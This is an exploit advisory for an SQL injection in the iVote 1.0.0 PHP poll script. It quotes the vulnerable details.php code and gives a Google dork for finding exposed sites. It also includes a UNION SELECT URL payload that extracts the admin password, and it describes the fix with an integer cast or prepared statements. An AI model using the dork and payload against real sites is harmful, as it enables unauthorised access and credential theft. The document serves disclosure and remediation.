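# Exploit Title: iVote SQL Injection
# Google Dork: inurl:details.php?id=
# Date: 2013 July 11
# Exploit Author: Ashiyane Digital Security Team
# Software Link: http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
# Version: 1.0.0
# Tested on: Linux CentOS , Linux Ubuntu , Windows 8

Vulnerability : details.php on line 5

$id = $_GET['id'];
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");
$row = mysql_fetch_array($select);

Cause : the id parameter is read from the query string and placed, unquoted and unvalidated, into both SELECT statements, so anything that follows the number is parsed as SQL.

///////////////////////////////////////

Example :

http://example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings

Fix : cast the parameter to an integer before it reaches the query ($id = (int) $_GET['id'];) or bind it through a prepared statement with mysqli or PDO. The mysql_* functions used here are deprecated since PHP 5.5 and removed in PHP 7.

///////////////////////

TNX : Rz04 & Crypt0
I Love Iran & all IRanian Black Hats :X
I'm , Bi Edea (R3za)
Email : momtane666@yahoo.com
Gmail : kafaran.blackhats@Gmail.com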